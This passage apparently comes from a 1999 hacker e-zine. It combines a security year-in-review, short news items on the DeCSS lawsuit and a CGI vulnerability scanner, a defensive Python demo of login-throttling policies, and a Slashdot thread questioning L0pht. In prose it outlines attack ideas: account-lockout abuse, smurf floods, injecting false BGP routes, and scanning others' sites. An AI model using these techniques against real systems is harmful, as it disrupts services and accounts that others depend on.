3.30.99 When NATO began bombing Serbia in March, Serbian hackers began a low-level campaign of harassment directed at U.S. government and military agencies. The "Black Hand" hacker group—possibly named after the notorious Sicilian secret society associated with the Mafia—and the "Serbian Angel" hackers threatened to damage NATO computers in retaliation for the war against the Serbs. On March 29, the White House Web site was defaced by red letters reading "Hackerz wuz Here." Speculation was rife that anti-NATO activists were involved. According to a Russian newspaper, unknown hackers on March 30 damaged a main NATO Web server, forcing it offline for at least a half-hour. The claim, however, was unconfirmed by NATO sources.

Penetration, Phreaking, Legal Action

9.10.99 According to a report in The Wall Street Journal, the successful Y2K-compliance tests carried out in early September by the North American Electric Reliability Council (NERC) with the involvement of more than 500 utilities, electric cooperatives, power pools and power plants were marred by a criminal-hacker penetration of the Bonneville Power Administration center. The Bonneville center happened to be where Bill Richardson, the Secretary of the Department of Energy, was observing the tests.

9.29.99 Frans De Vaere admitted breaking into the Web site of a Belgian bank in mid-August. He stole logon IDs and passwords and successfully accessed the account balances of many customers. Luckily, De Vaere was unable to effect any transactions. The bank, identified as "Generale de Banque" in a report in The Scotsman newspaper, refused to take legal action against De Vaere. However, the Skynet ISP run by the state telecom company, Belgacom, was not so accommodating. The criminal hacker broke into more than 1,000 Web sites on Skynet and stole the credit card numbers of about 20 clients. Police began an investigation, but unfortunately Belgium has no specific law addressing computer crime, and so the intruder went unpunished.

Counterfeits, Forgery (Including Piracy), Shoulder Surfing

4.10.99 Jim Loney wrote a summary for Reuters about the losses due to piracy of intellectual property and counterfeiting. Some key points of Loney’s report include the following:

• U.S. Customs Commissioner Bonni Tischler predicted that copyright violations and counterfeiting was "going to dwarf every type of crime in the next millennium."
• U.S. companies lose an estimated $200 billion a year to product piracy involving designer clothes, shoes, handbags, software, CDs and videos.
• Worldwide, software piracy costs industry $11 billion a year.
• 38 percent of the 615 million new software product installations are illegal copies.
• 97 percent of all the software in Vietnam is stolen.
• More than 90 percent of all software in Bulgaria, China, Indonesia, Lebanon, Oman and Russia is stolen.
• 60 percent of the software sold via online auctions is illegitimate.

Sabotage (Excluding Web Sites)

4.14.99 In Melbourne, Australia, a 33-year-old network administrator pleaded guilty to three charges of damaging property and 30 charges of computer trespass.
Ya Ge (Jacob) Xu admitted hacking into his former employer’s systems at Intergraph Public Safety to plant a virus and to "cause trouble" when he was refused acceptable payment for unpaid overtime. Xu was fined AU$6,000, but was not sentenced to jail time.

9.29.99 A criminal hacker calling himself "Red Attack" threatened Belgian firms with electronic sabotage in a misguided attempt to draw attention to security vulnerabilities. A few weeks later, a different person claimed he was the real Red Attack, saying he would switch Belgian electrical power off for a couple of hours on Sept. 29 and break into the Belgian Prime Minister’s e-mail account. After earnest conversations with a company director of the Electrabel utility, the idiot agreed that maybe his demonstration wasn’t such a great idea after all. In the end, the threats all evaporated in yet another hoax perpetrated on gullible journalists and officials.

Quality Assurance (Security Products)

8.31.99 In August, two serious security holes were demonstrated on Microsoft’s Hotmail system, which the company claims to be the biggest free Web-mail system in the world, with millions of subscribers. The problems were as follows: (1) An error in the code for entering data into a form allowed a user login without any password at all; (2) An undocumented back door allowed anyone to log in to any Hotmail account using the canonical (or possibly Canadian) password "eh." These problems meant that all unencrypted Hotmail e-mail was readable to anyone who used the exploits, and that such people could also impersonate their victims through e-mail. The holes caused Microsoft to shut down access to Hotmail for a day while the vulnerabilities were removed.

Availability Issues (Not Denial-of-Service)

3.01.99 Jerry Leichter pointed out in RISKS that URLs are an unstable form of reference to scholarly work. He cited a case in which interesting papers disappeared from an academic Web site when the sponsoring research was disbanded.
He also worried about using commercial sites as repositories for papers, arguing that the vicissitudes of the market make the destiny of such storage uncertain at best.

10.20.99 The Encyclopaedia Britannica opened its long-awaited free Web site—www.britannica.com—which immediately crashed because an order of magnitude more people tried to access the site than expected.

Java, Javascript, ActiveX, Mobile Malicious Code

1.15.99 Drs. Edward Felten and Gary McGraw published a new book about mobile code security. In addition to the physical book, Securing Java: Getting Down to Business With Mobile Code, these experts put the entire text online at www.securingjava.com. The hope was that the free edition would not harm sales of the paper book.

8.03.99 Because Microsoft believes that word processing, spreadsheet and presentation software should allow automatic execution of macros—thus turning these products into programming languages—they also allowed their Internet Explorer browser to load these programs without alerting users. In August, Microsoft scrambled to issue patches to correct this design flaw so that unwary users would not be subjected to hostile code merely by downloading documents from a hostile Web site or by reading e-mail attachments. The principle still stands: Don’t double-click attachments of uncertain origin or unvalidated safety.

RFI, Jamming (Not Interception)

1.29.99 In Crystal River, Fla., an innocent user unknowingly blocked all other cellular calls in his area whenever he used his new cell phone. The outages lasted 10 days while GTE tracked the problem down to his phone, which they replaced. This case illustrates the susceptibility of the highly computer-dependent cellular-phone system to disruption.

4.16.99 Automatic garage doors in a six-mile radius of the port at Hobart, Australia, were shut down by the USS Carl Vinson’s powerful 310-320 MHz communications transmitters—which happened to override the short-range electronic communications channel allocated by the Australian regulatory bodies for such devices as garage-door openers. In addition, one poor soul was unable to move his car when the transmissions overrode his car security system, locking the vehicle down until the huge ship left.

Operating Systems, Network Operating Systems, TCP/IP Problems (Alerts)

1.12.99 Microsoft admitted that its Windows 95, Windows 98 and Windows NT operating systems contained a bug in the MSVCRT.DLL file that would delay the start of daylight savings time by a week on April 1, 2001. The April Fool’s bug would affect about 95 percent of all PCs in the world, but could be fixed by patches that were posted on the Web by Microsoft.

7.26.99 CERT/CC issued an alert on buffer overflow vulnerabilities on several UNIX systems, including Solaris and HP-UX. Using this violation of memory array restrictions, criminal hackers could plant logic bombs and back doors on victimized systems. Manufacturers scrambled to provide patches.

Denial-of-Service

1.12.99 According to an article by Tim Barlass in the Daily Telegraph of Australia, someone launched a sustained smurf denial-of-service attack on Ozemail, a popular Australian ISP. A smurf attack uses widely available software written by criminal hackers to send ping packets with forged origination in the headers to a (usually major) corporate network’s broadcast address. Every device—perhaps hundreds or thousands in all—sends a reply packet to the forged originator address. That system thus receives a flood of packets, often overloading its TCP/IP stacks and resulting in denial-of-service. The attack disrupted e-mail service for users in Sydney.
A company spokesperson said Ozemail was trying to track down the perpetrator and was considering installing filtering software to prevent future attacks.

2.12.99 USA Today reported that Hotmail and Yahoo, providers of free e-mail, were improving security by shutting down any account subject to several unsuccessful attempts to log in. This is one of the oldest mistakes in systems management, since it immediately opens each account to a trivially easy denial-of-service attack: Simply try to log on several times to a victim’s account with a wrong password, and voilà, no further legitimate access is permitted until the account is reset.

Web Attacks, Vandalism

1.16.99 Daniel Tobias was startled when a colleague complained that Tobias’s Web page included a link to a pornographic Web site. Indeed, one of Tobias’s originally inoffensive links was redirected to a porn site. The problem turned out to be Web URL hijacking: The original owner of a domain either sold its domain to the pornographer or allowed the domain registration to lapse. The new domain owner programmed his Web site to point all references to the original pages at the original domain to his home page, instead of returning a "404 Not Found" message.

10.26.99 A criminal hacker or hacker group calling itself "phreak.nl" attacked U.S. Web sites in the last week of October. According to a Newsbytes article by Bob Woods, the criminals damaged Web sites of NASA’s JPL, the U.S. Army’s Redstone Arsenal’s Program Executive Office and the National Defense University. All these sites were described by a hacker-publicity group, Attrition.org, as running Windows NT servers. The defacements consisted of the usual puerile sneers and insults in the peculiar spelling affected by the criminal hacker subculture. One common theme was the notion that "phreak.nl" was engaged in "a game ... called hack the planet." In addition to these attacks, phreak.nl also damaged sites for All Timeshare, Pet GBets and WPYC.
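
The 2.12.99 Denial-of-Service entry above argues that disabling an account after several bad logins hands anyone the ability to lock the real owner out. The following is an added example, not part of the InfoSecurity article: it contrasts that hard per-account lockout with a backoff keyed on the (account, source) pair. The class names, threshold, delays, addresses and account data are all assumptions constructed for the illustration.

```python
import hashlib
import hmac
import os
from collections import defaultdict

THRESHOLD = 3        # assumed; the article only says "several" failed attempts
BASE_DELAY = 1.0     # seconds of delay once THRESHOLD is reached (assumed)
MAX_DELAY = 300.0    # cap on the backoff (assumed)


class _Accounts:
    """Salted PBKDF2 password store shared by both policies (demo data only)."""

    def __init__(self, passwords):
        self._db = {}
        for user, pw in passwords.items():
            salt = os.urandom(16)
            self._db[user] = (salt, self._kdf(pw, salt))

    @staticmethod
    def _kdf(password, salt):
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)

    def check(self, user, password):
        if user not in self._db:
            return False
        salt, stored = self._db[user]
        return hmac.compare_digest(stored, self._kdf(password, salt))


class HardLockout(_Accounts):
    """The criticised policy: THRESHOLD failures disable the account for everyone."""

    def __init__(self, passwords):
        super().__init__(passwords)
        self.failures = defaultdict(int)
        self.locked = set()

    def login(self, user, password, source, now):
        if user in self.locked:
            return "locked"          # even the correct password is refused
        if self.check(user, password):
            self.failures[user] = 0
            return "ok"
        self.failures[user] += 1
        if self.failures[user] >= THRESHOLD:
            self.locked.add(user)    # stays locked until an admin resets it
        return "denied"


class SourceThrottle(_Accounts):
    """Alternative: exponential backoff applied only to the failing (user, source) pair."""

    def __init__(self, passwords):
        super().__init__(passwords)
        self.failures = defaultdict(int)
        self.retry_after = defaultdict(float)

    def login(self, user, password, source, now):
        key = (user, source)
        if now < self.retry_after[key]:
            return "throttled"       # this source must wait; others are unaffected
        if self.check(user, password):
            self.failures.pop(key, None)
            self.retry_after.pop(key, None)
            return "ok"
        self.failures[key] += 1
        over = self.failures[key] - THRESHOLD
        if over >= 0:
            self.retry_after[key] = now + min(BASE_DELAY * 2 ** over, MAX_DELAY)
        return "denied"


def simulate(policy_cls):
    """Five bad guesses from one source, then the owner logs in from another.

    Addresses are documentation ranges (RFC 5737); all data is constructed.
    """
    policy = policy_cls({"alice": "correct horse"})
    guesses = [policy.login("alice", "guess%d" % i, "203.0.113.9", float(i))
               for i in range(5)]
    owner = policy.login("alice", "correct horse", "198.51.100.7", 10.0)
    return guesses, owner


if __name__ == "__main__":
    for cls in (HardLockout, SourceThrottle):
        print(cls.__name__, simulate(cls))
```

Keying the delay on the source stops one client from locking out the owner, but it slows guessing less when attempts arrive from many sources, so it is normally paired with monitoring of total failures per account.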

Intrusion Detection Systems

7.29.99 A major row broke loose in the privacy community when the Clinton administration and the FBI announced their Federal Intrusion Detection Network (Fidnet) initiative to monitor network intrusions on not only government systems but also critical infrastructure components such as banking, communications and transport. House Majority Leader Dick Armey (R-Texas) attacked the Fidnet proposal, and the House Appropriations Committee removed funding for the project from its versions of the relevant appropriations bills. In August, one of Fidnet’s main architects spoke out in defense of the plan. Richard Clarke, National Coordinator for Security, Infrastructure Protection and Counterterrorism, explained that fears of an "electronic Pearl Harbor" (a term popularized by Winn Schwartau of infowar.com in the early 1990s) led to Presidential Decision Directive 63 and that Fidnet was one of the first major computer security programs proposed in response to the Directive. He assured skeptics of minimal involvement of the FBI, saying that Fidnet would be managed by the National Infrastructure Protection Center (NIPC), not the Department of Justice, and would not intrude on personal or corporate privacy. On Sept. 27, Rep. Armey sent another challenge to the DoJ demanding clarification of critical elements of Fidnet.

Surveys, Estimates

2.23.99 The annual Australian Computer Crime and Security Survey, organized by the Victorian Computer Crime Investigation Squad and Deloitte & Touche Tohmatsu, reported on computer crimes in 350 of the largest Australian companies. In brief, the report found that about one-third of the respondents had suffered one or more attacks on their systems in 1998; of those, 80 percent had experienced insider attacks, while 60 percent had experienced outsider attacks. About 15 percent of the respondents that had experienced attacks said they had been the targets of industrial espionage.
Almost three-quarters of all the respondents had no formal policy requiring notification of police authorities in case of attack. More than one-fifth of all respondents had experienced a breach of confidentiality; one-fifth also experienced a breach of data integrity.

4.07.99 The Fourth Annual Computer Security Institute/Federal Bureau of Investigation (CSI/FBI) Computer Crime and Security Survey demonstrated yet again that computer crime is a growing problem for U.S. companies, financial institutions and government agencies. Losses amounted to hundreds of millions of dollars, much of it resulting from industrial espionage. Among the survey’s key findings:

• 26 percent of respondents reported theft of proprietary information.
• System penetration by outsiders increased for the third year in a row; 30 percent of respondents reported intrusions.
• Those reporting their Internet connection as a frequent point of attack rose from 37 percent of respondents in 1996 to 57 percent in 1999.
• Unauthorized access by insiders rose for the third straight year; 55 percent reported incidents.
• More companies—32 percent compared with 17 percent in the past three years—are reporting serious cybercrimes to law enforcement.

7.01.99 A survey of readers of this magazine confirmed that organizations conducting Internet e-commerce experience far more information security breaches than those that do not conduct e-commerce. Among other findings, the study found that companies conducting business online are 57 percent more likely to experience a leak of proprietary information, and 24 percent more likely to experience a hacking-related breach. Overall, the number of companies hit by an unauthorized access breach increased nearly 92 percent from 1998 to 1999. Average loss per company to security breaches was $256,000.

7.12.99 InformationWeek surveyed 2,700 information technology professionals in 49 countries on a variety of security-related issues.
Among the highlights:

• 64 percent of companies fell victim to a virus attack in the past 12 months, up from 53 percent the previous year.
• In the U.S. alone, viruses hit 69 percent of companies, about four times as many as that of the next-highest category of security breach: unauthorized network entry.
• 22 percent of companies reported no security breaches at all.
• 48 percent of respondents blamed hackers for security breaches, up from 14 percent in 1998.
• 31 percent of respondents blamed contract service providers for breaches (up from 9 percent in 1998).
• 41 percent blamed authorized users and employees (down from 58 percent in 1998).

8.01.99 ICSA.net’s Fifth Annual Virus Prevalence Survey found that the likelihood of a company experiencing a computer virus more than doubled for each of the past four years. Approximately 43 percent of respondents had experienced a "virus disaster," defined as 25 or more PCs or servers infected at the same time. Slightly less than two-thirds of the latest virus disasters experienced were caused by macro viruses infecting Microsoft Word and Excel files. In 1999, more than half of the survey’s respondents encountered viruses via e-mail in their virus disasters, a significant increase over previous years.

Acceptable-Use Policies, Spam Wars (Corporate)

6.14.99 GartnerGroup surveyed 13,000 e-mail users around the world about their experiences with spam. The results were alarming:

• 90 percent of the respondents received at least one junk e-mail per week.
• 96 percent of those online for four years or more received junk e-mail at least once a week.
• 33 percent got between six and 10 junk messages a week.
• ISPs lose approximately 7 percent of their new users every year because of disgust with spam.
• 40 percent of the respondents agreed that spam should be banned.
• 25 percent said that spam should be regulated.
• 3 percent of the respondents enjoyed it to some extent.

Crypto Algorithm Weakness, Brute-Force Attacks

1.19.99 Under the direction of John Gilmore, a team from the Electronic Frontier Foundation (EFF) and Distributed.net cracked RSA Data Security’s DES Challenge III in 22 hours, winning a grand prize of $10,000. The decryption was a demonstration of the weakness of the DES and a blow against the U.S. government’s restrictions on the export of strong encryption products.

8.16.99 Adi Shamir (the "S" in RSA) of the Weizmann Institute of Science in Rehovot, Israel, announced a successful brute-force attack on a 512-bit RSA private key; the cryptanalysis took seven months and required 292 computers at 11 different sites. However, Shamir also described the theoretical design for a $2 million cryptanalytic computer called "TWINKLE" that could apply brute-force attacks successfully to RSA keys of 512 bits or less in less than a week.

New I&A Products (Tokens, Biometrics, Passwords)

1.01.99 Scientists in Britain established the uniqueness of ear-cartilage patterns and successfully prosecuted a burglar who put his ear to a window to detect sounds in the home he burgled. The thief murdered a 94-year-old woman and was consequently sent to prison for life. The police authorities had gathered 1,200 ear prints from volunteers by the end of 1998 and were hoping to begin collecting ear prints from suspects.

Cryptography Exports From the U.S.

9.16.99 President Clinton issued a public letter addressed to Congress that pushed for passage of the Cyberspace Electronic Security Act of 1999 (CESA), which simultaneously deregulates most encryption software exports and provides for key escrow accessible to law enforcement agencies under warrant.

Key Escrow/Recovery Laws

4.09.99 Andrew Fernandes of Cryptonym, a Canadian security firm, seems to have gone off half-cocked when he found a signing key for integrating cryptographic modules into Windows that was labeled "NSAKey."
He and other conspiracy buffs interpreted this label to mean that there was somehow a back door into Windows that would allow the National Security Agency to integrate its own cryptographic modules into the operating system, yet have the version check out using digital signature verification. Such manipulations could generate versions of Windows with a back door for the NSA. Microsoft denied this interpretation and claimed that the key was "compliant with the NSA’s technical standards." A particularly clear discussion by Russ Cooper on NTBugtraq pointed out that the conspiracy theory was farfetched, but warned that it would indeed be possible for anyone to insert their own cryptographic modules into Windows and sign them using their own digital key. This would allow foreign crypto to run under Windows even without signature by Microsoft or approval by the U.S. Department of Commerce under the Export Administration Regulations (EARs).

Privacy, Privacy Legislation

4.16.99 Kevin Cooke, development manager at Wired magazine, discovered that Microsoft’s Internet Explorer version 5.0 sends information to a Web site when the user bookmarks the site’s URL. In an interview with Chris Oakes of Wired, Microsoft product manager Mike Nichols said, "This is one of those things where we did not see the privacy issue when we were creating the feature. The feature doesn’t pose a super-huge risk. But Microsoft is looking at ways of modifying this feature in future releases." Apparently, the feature was designed to allow a Web site to supply an icon to be stored on the user’s system so any "Favorite" would be "branded" with that icon.

11.03.99 RealNetworks admitted that it had been collecting information about exactly what users of its RealJukebox player were listening to. The company did not inform users of the monitoring, and got hammered by its competitors, privacy advocates and many users.
The company immediately changed its public privacy statement to let people know about the data collection function, and its spokesperson swore that the data had been aggregated so that no one could trace the specific interests of any one user. The company immediately apologized to the public for the concerns it had caused, and provided a patch to disable detailed reporting.

Review in Review

While this article gives you a glimpse of some of the significant developments in the field of infosecurity in 1999, there is no way to include an excerpt from each category of the full report. However, the full Infosec Year-in-Review database (see www.icsa.net) classifies hundreds of cases and issues spanning the field of information security. I encourage you to download the full PDF file in early 2000 for further review and discussion of the events of 1999.

M. E. Kabay, Ph.D., CISSP (mkabay@icsa.net), is director of education for ICSA Labs.

Footnotes:

These malicious programs are called "virus/worms" because they integrate into the operating system (i.e., they are virus-like), but also replicate through networks via e-mail (i.e., they are worm-like).

See Bruce Schneier's Crypto Year-In-Review column for further discussion of 1999 cryptography events.

@HWA

21.0 Butchered From Inside 7 12/27/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by del0rean

Butchered From Inside is an electronic publication of free speech and distribution. Issue #7 has just been released and it includes articles on spoofing, CCC Camp review, Gork, and WinnAMP. Sorry, it is in Italian only.

Butchered From Inside
http://www.s0ftpj.org/bfi

@HWA

22.0 DVD Industry Sues over 500 Defendants in Anti-Piracy Lawsuit 12/28/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Mazzic and Macki

The DVD Copy Control Association, Inc., (DVD CCA) a non-profit trade association, has named 21 defendants and 500 John Doe's in a lawsuit filed in Santa Clara County Superior Court. The lawsuit alleges that the defendants misappropriated 'trade secrets' and 'proprietary information' and distributed the information via their web sites. The defendants, by posting DeCSS software, caused the illegal pirating of the motion picture industry's copyrighted content contained on DVDs. E-mail from the California law firm Weil, Gotshal & Manges, LLP notified the defendants late yesterday afternoon that they are seeking a restraining order from the court.

DeCSS was independently developed in Norway earlier this year. The software allows the playing and copying of DVD movies on Linux computer systems. Apparently the mirroring of the DeCSS software was enough to turn ordinary people into criminals who want to destroy the entire motion picture industry and ruin all that is good in the world. (I would really like to know how a county court can process an injunction that is valid in 12 states and eleven countries?)

HNN's copy of the legal complaint
http://www.hackernews.com/special/1999/dvdinjunction.html

2600.com - One of the defendants
http://www.2600.com/news/1999/1227.html

DeCSS Defense Site
http://www.lemuria.org/DeCSS/

DVD Copy Control Association
http://www.dvdcca.org/dvdcca/index.html

@HWA

23.0 Web Based CGI Vulnerability Scanner Released 12/28/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by webmaster

Check your web site (or anyone else's) for 64 known CGI vulnerabilities in seconds.
If you have new vulnerabilities not included in the scanner you can submit them here
mailto:webmaster@digital-harmony.com

Web Based CGI Scanner
http://www.nobullshit.org/

@HWA

24.0 L0pht Interviewed by Slashdot
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Joey
L0pht Heavy Industries, the premier hacker think tank, has been honored by Slashdot as the next victim in their community interview process. So far many of the proposed questions are very interesting and should elicit some great responses. Add your voice to the fray.

Slashdot.org
http://slashdot.org/article.pl?sid=99/12/27/1015213&mode=thread

I've reproduced the 'interview' here but the format is a real mess and i'd have to spend hours editing it, so just follow along best you can or go to the link it should lead you to the archived version on Slashdot, here it is unformatted. - Ed

Shutting down the Internet (Score:3, Interesting)
by papo (papo@uninet.com.br) on Monday December 27, @12:04PM EST (#1)

You said in an interview that it's possible to shut down all the Internet. How might you possibly do that? With a DoS attack in some routers or by taking command of some servers in the principal backbones of the USA?

"Learning, learning, learning - that is the secret of jewish survival" -- Ahad A'Ham

Re:Shutting down the Internet (Score:1)
by merky1 on Monday December 27, @12:07PM EST (#5)

If I can add to this.. What event would cause you to take down the internet?

--WooooHoooo--

Re:Shutting down the Internet (Score:3, Informative)
by jd on Monday December 27, @12:16PM EST (#20)

That one's easy. Very few routers have authoritative checks set up. Simply fire up a router such as gated and have it inject false routes into the net. Have the backbone located at the South Pole, for instance. The UK network's been crashed dozens of times, by this.
Usually by poor network administration, or faulty software, but that's just details. What an admin can do through ignorance, I'm sure crackers could do by design.

Re:Shutting down the Internet (Score:0)
by Anonymous Coward on Monday December 27, @02:29PM EST (#111)

hmm... something about poisoning BGP tables?

Re:Shutting down the Internet & a question 2 L0pht (Score:1)
by EchoMirage on Monday December 27, @03:55PM EST (#136)

Many/most people that laughed at this claim forget that computer networks operate almost identically to power grids. By taking out all the Cisco routers, for instance, you might only take 30%-50% of the networks, but as other networks attempt to fail over and become dependent on the still live networks, those networks, routers, and servers become overloaded with the traffic and start to fail. It's a domino effect. This is the reason when someone with a backhoe cuts a major cross-continental fibre line, the rest of the Internet, especially in nearby affected areas, slows to a crawl because other networks failing over to another backbone creates a strain on those lines and equipment.

Now, for my question to L0pht: What, in terms of network design, do you see as the single biggest threat to security?

Re:Shutting down the Internet & a question 2 L0pht (Score:0)
by Anonymous Coward on Tuesday December 28, @08:42PM EST (#222)

the lack of attention to detail.

Re:Shutting down the Internet (Score:0)
by Anonymous Coward on Monday December 27, @01:38PM EST (#82)

I think there is a better question. First, the claim is a bit of a braggadocio, it's easy to talk and the statement is pretty vague to begin with. That is sort of the nature of cracking community. I'm not going to say that it's not possible, corrupting router tables is a very good place to start and there are probably a few computing centers where a good DoS attack could seriously hamper internet traffic but those aren't really crashing things and they usually don't last that long.
There is a huge difference between cutting down the performance and making lots of traffic go through smaller pipes and crashing or stopping the net, the bigger it becomes the more reliable it becomes. As more and more infrastructure becomes dependent on the net, the net becomes more and more connected and more and more security is placed on more important pieces. Companies like AOL, TCI/ATandT, Qwest, mindspring, Amazon, etc... have substantial financial incentive to protect the net, secure their servers and network infrastructure, and have staff on duty ready to catch and fix problems as soon as they happen. 15 years ago, you could have easily attacked one router and substantially crippled the net, you could have gone after 5 or 10 and pretty much shut it down. It is so much more connected today than it was then, you can cut a couple of major channels and there are others that stay up. There is no longer one east-west network pipe, there are numerous pipes and it keeps getting more and more connected. Take that major power-outage that cut power to most of the western US and parts of Canada a couple years back, the internet didn't blink.

If you do believe that you can crash it, how much longer do you think it will stay that way? Or do you even think that it is progressing towards a much more stable and crash-resistant infrastructure, please explain.

Then on the ethics side (sorry to over shoot the one q per post rule) if you do believe you can do it, what have you done to get the problems fixed or at least publicize the methods so they can be corrected for? I would think that it would be good for business to take credit for stopping a potentially huge network shutdown.

Re:Shutting down the Internet (Score:0)
by Anonymous Coward on Tuesday December 28, @08:50PM EST (#223)

I have experienced the provider's, "...substantial financial incentive to protect the net, secure their servers and network infrastructure..." And I don't like it, at all.
I had one of the listed providers with a misconfigured (or 0wned) that was allowing source routed packets to my machines. The, "...staff on duty ready to catch and fix problems as soon as they happen...", was quite willing to disable source routing, after I informed them of the invalid packets. I think the main lesson here is: When you assume, it makes an ASS out of U and ME.

Re:Shutting down the Internet (Score:0)
by Anonymous Coward on Monday December 27, @01:38PM EST (#84)

Read this comment.

Re:Shutting down the Internet (Score:1)
by batz (batz@vapour.net) on Tuesday December 28, @06:11PM EST (#221) http://www.vapour.net

Apologies for the flagrant plug, but this was covered in depth at Blackhat '99 in Las Vegas. All the presentations are online, including mine, which detailed problems with the way that BGP is designed, implemented and configured. It's all available at www.blackhat.com

They made this claim almost 2 years ago. I wouldn't speak for them, but it's kinda like asking yelling "Ziggy!" at a David Bowie concert.

-- batz
Chief Reverse Engineer
Superficial Intelligence Research Division
Defective Technologies

Y2k Hacking (Score:3, Interesting)
by merky1 on Monday December 27, @12:04PM EST (#2)

Do you agree with the President's plea to cease hacking activities for Y2K, and do you think it will have an adverse effect?

"Those [filthy|pagan|heathen|whiny] americans, I'll show them....."

--WooooHoooo--

Job offers (Score:1)
by eyeball on Monday December 27, @12:07PM EST (#6) http://www.spacehaven.com

Whenever the subject of securing our web servers comes up at work, someone inadvertently says "We should hire one of those L0pht guys." As if you have nothing better to do than to work for a starving second-rate e-commerce IPO. My question is: Do you get job offers like this? If so, how does it feel? Do you refer them somewhere?

I'm looking for Sara Shelton from the Oregon/Washington area. Please email me if you know her.
Re:Job offers (Score:0)
by Anonymous Coward on Monday December 27, @12:59PM EST (#54)

"How does it feel?" What a bizarre question. Well, let me give an answer. I'll answer it in as much detail as possible so you can really get a good sense about what a job offer from a second-rate IPO e-commerce outfit feels like. Pay close attention. It's best to read this twice, as it will take at least two readings for your imagination to kick in. (I say this because from the sound of the question -- asking how a job offer feels -- I get the sense that (a) you're still in college and have not had a job offer, (b) are working at a job and are a little slow, or (c) are truly a blockhead and have no idea how the real world works and that, well, a job offer doesn't feel like much -- or at least not much that is easily quantifiable.)

So, this is what it feels like: It feels all tingly. It feels like when you're in the ocean and you've been swimming out away from the beach for about 20 minutes, and then suddenly you turn back toward shore, swim for another 20 minutes, and then get up on the beach and walk to the beach house for a nice, cool Pina Colada. That's about the closest I can describe it.

Well, okay, not entirely true. It feels like when you've been standing on a train platform on a cold morning and then the train comes whooshing by and kicks up a tiny pebble which zings toward your face, hits your glasses, cracks the lens, and then zigs to the right and dings your nose. It feels the way your nose feels after the pebble has fallen back to the platform and you're standing there -- standing wearing your goose-down winter coat, your thick gloves, and carrying your briefcase -- and you must walk up the steps into the train vestibule with a horde of other commuters.
The ding from the pebble stings -- but only a little bit -- but you're more worried about whether or not the pebble caused your nose to bleed (you can't tell because you have gloves on) -- but you're self-conscious since people are looking at you, and you're not sure if they're looking at you because your glasses are cracked, because the side of your nose is bleeding, or because you look a little shell-shocked because you just got whipped by a pebble shot up from the steel wheels of the train.

That's about the best way to describe how the job offer from a second-rate outfit feels like.

Re:Job offers (Score:1)
by eyeball on Monday December 27, @02:28PM EST (#109) http://www.spacehaven.com

Haha. Wow, that good? I wonder how it feels when the stock options kick in. :)

I'm looking for Sara Shelton from the Oregon/Washington area. Please email me if you know her.

Re:Job offers (Score:1)
by |deity| on Monday December 27, @08:49PM EST (#181)

I know this is a little off topic. I'm a student, working on a degree in computer science I would like to work in the security field where should I start? What kind of things should I be doing to prepare myself for a job in this field. I've been programming for about nine years in various languages.

Re:Job offers (Score:1)
by eyeball on Monday December 27, @09:13PM EST (#182) http://www.spacehaven.com

2 pieces of advice:
1) start as a network/sysadmin and prove yourself
2) don't take advice from anyone, especially mine :)

I'm looking for Sara Shelton from the Oregon/Washington area. Please email me if you know her.

Re:Job offers (Score:0)
by Anonymous Coward on Wednesday December 29, @08:02AM EST (#228)

Be a sys admin, do a security audit (hack your servers) and tell your managers that they are vulnerable, they will fear you (if they don't fire you) then tell them they should have a full time security tester (Then make that your job title).
Which do you consider more dangerous (Score:5, Interesting)
by Gleef (gleef@capital.net) on Monday December 27, @12:09PM EST (#7) about:mozilla

Which do you consider more dangerous to personal liberties on the Internet, national governments or multinational corporations, and why?

---- Open mind, insert foot.

Um (Score:1)
by Synn on Monday December 27, @12:10PM EST (#8)

How the frag do you pronounce L0pht? And what the hell does it mean? Somebody write me a perl warez filter for pete's sake. All this kewl l33t drek is driving me insane.

Re:Um (Score:1)
by GeorgeH (georgeah@nOsPaM.home.pLeAsE.com) on Monday December 27, @12:19PM EST (#25) http://slashdot.org/comments.pl?sid=GeorgeH

Ell Zero Pee Aitche Tee
L 0 P H T : PH = F (in crazy english)
L0FT : 0 = O (in crazy 1337 5p33k)

loft
1 : an upper room or floor : ATTIC
2 a : a gallery in a church or hall b : one of the upper floors of a warehouse or business building especially when not partitioned c : HAYLOFT
3 a : the backward slant of the face of a golf-club head b : the act of lofting
4 : the thickness of a fabric or insulating material (as goose down)

-- I hate spelling and grammar nazis.

Re:Um (Score:2)
by bbk (insert@pithy.email.obfuscation.here) on Monday December 27, @12:22PM EST (#29)

l0pht is pronounced "loft" - synonymous with attic. l0phters are people who dumpster dive looking for computer parts, usually in large companies' trash bins, and carry the parts back to their l0pht where they use them. I've l0phted a couple monitors and cases from my ever so friendly ECE department before... It's a great way to get an eclectic computer collection for very little!

Re:Um (Score:2)
by BradyB (bradyb@mailandnews.spam.com) on Monday December 27, @12:24PM EST (#33)

I always thought that L0pht stood for LOW PHAT as in Low fat as in high speed low drag.

Good is never good enough when you dream of being the best.

Just out of curiosity...
(Score:1) by Ater (ater@nospam.goatse.cx) on Monday December 27, @12:10PM EST (#9) http://www.redrival.com/ater

Where did you guys come up with the name, "the l0pht?" Does the 0 in it (as opposed to an O) have some special significance?

--- Do you want to change your name to Homer Jr.? The kids can call you Ho-Ju! ---

0 is Ø. (Score:0)
by Anonymous Coward on Monday December 27, @05:42PM EST (#158)

Well - According to l0pht's logo. L0pht is actually written LØpht. Ø is scandinavian.

Re:0 is Ø. (Score:1)
by Levine (bourgon@bigfoot.com) on Monday December 27, @06:12PM EST (#162)

Most CS people write their zeros with a line through it.

Levine

Re:0 is Ø. (Score:1)
by myconid (myconid@deletethispart.sover.net) on Monday December 27, @07:43PM EST (#178) http://www.myconid.com

Unless they have ever taken a math class in their life and realise 1-1 = Slashed 0 isn't true :-)

SB. (C) 2000

Re:0 is Ø. (Score:0)
by Anonymous Coward on Tuesday December 28, @02:32AM EST (#202)

oh oh, let the pre-calculus student in high school answer that one, Ø is nullset, or is that with the slash in the opposite direction? well, as someone put it in another post, do not take anyone's advice, especially mine

Re:0 is Ø. (Score:1)
